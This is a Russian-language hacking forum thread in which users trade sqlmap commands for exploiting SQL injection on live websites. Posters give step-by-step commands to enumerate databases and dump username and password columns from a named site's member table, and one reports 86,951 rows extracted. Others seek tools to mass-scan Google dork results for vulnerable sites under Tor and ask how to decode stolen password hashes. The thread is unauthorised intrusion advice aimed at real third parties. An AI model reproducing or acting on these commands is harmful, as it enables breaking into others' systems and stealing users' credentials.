как сделать дамп бд с сохранением структуры таблиц. Таблица 1 Таблица 2 Таблица 3 11111111 222222222 333333333 А не строчками,делаю дамп получается 11111111222222222333333333 - не очень удобно
Подскажите дамп открыл таблицу сразу а sqlmap перебирает по букве.Что я делаю не так? sqlmap -u http://www.site.ru/showbanner.php?banner_id=' and [t] and '1'='1 --dbs
Ну так дорка у меня такая и есть без id http://www.site.ru/showbanner.php?banner_id=' and [t] and '1'='1 --dbs просто кавычка
Пробуй так! sqlmap -u www.site.ru/showbanner.php?banner_id=X --dbs --no-cast где X - тот id, к которому ты сначала тыкал свою каывчку, больше ничего не надо, map сам всё подберёт! Но учти, после этой команды ты лишь узнаешь кол-во и имена БД... Далее узнаёшь кол-во и имена таблиц в нужной БД: sqlmap -u www.site.ru/showbanner.php?banner_id=X -D Y --tables --no-cast где Y - имя нужной БД. После дампишь нужную тебе таблицу: sqlmap -u www.site.ru/showbanner.php?banner_id=X -D Y -T Z --dump --no-cast где Z - имя нужной таблицы Иногда, если извлекается очень медленно, можно добавить ключ --threads 10 , например - те увеличить кол-во потоков.
C:\sqlmap.pyc sqlmap.pyc -u http://www.site.ru/showbanner.php?banner_id= -D sokulec_dev -T soku_member_14July2015 -C contact_email,password --dump Тоже самое.А таблицу я взял с дампера
[17:58:04] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Please retry with the switch '--text-only' (along with --technique=BU) as this case looks like a perfect candidate (low textual content along with inability of comparison engine to detect at least one dynamic parameter). Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment') Что бы это значило?
sqlmap -u www.sokule.com/showbanner.php?banner_id=1 -D sokulec_dev -T soku_member_14July2015 --dump -C username,password --no-cast --threads 10 Всё там нормально извлекается, не морочь голову...
the SQL query used returns 86951 entries Чтобы не быть голословным... Ты спорить взялся, или совета просишь!? Причём здесь твоя дорка? Не пойму никак... Ну да ладно, всё получилось, все молодцы!
коллеги, подскажие какой-нибудь софт для первичного анализа выдачи по доркам. Запускаю под тором sqlmap, начинаю с N-й страницы выдачи, ставлю на ночь - все равно мало сайтов хекается. Хотелось бы софтинку, которой дорк задаешь, она чекает за минуту пару сотен сайтов и выдает, допустим 20 уязвимых. Потом скармливаешь это sqlmap по списку. Кто что использует? Проблема большинства программ в том, что гугл выплевывать капчу начинает через через какое-то время. Есть может у кого-то софт который через какой-нибудь duckduckgo работает?
уважаемые, вопрос. была уязвимостьь, ее прикрыли ну или по текущй ссылке она уже не доступна, поднял проверку до лвл 5 риск 3, нашел уязвимость пишет что таблица не достуна, что-то можно сделать?
Здравствуйте. Бывает когда делаю дамп таблицы с паролями вместо паролей непонятные строки (наверное в какой-то кодировке) вот пример: \x9dęś\x8b\x0f§$(éę\x86ťšŻĹë ´Ë\x8cž\x04,ŹĆR|^\x85Ľ^\x14v \x02Ő6N\x8důž@ůĺIžN\rN] Кто-нибудь сталкивался? Как узнать нормальный пароль?
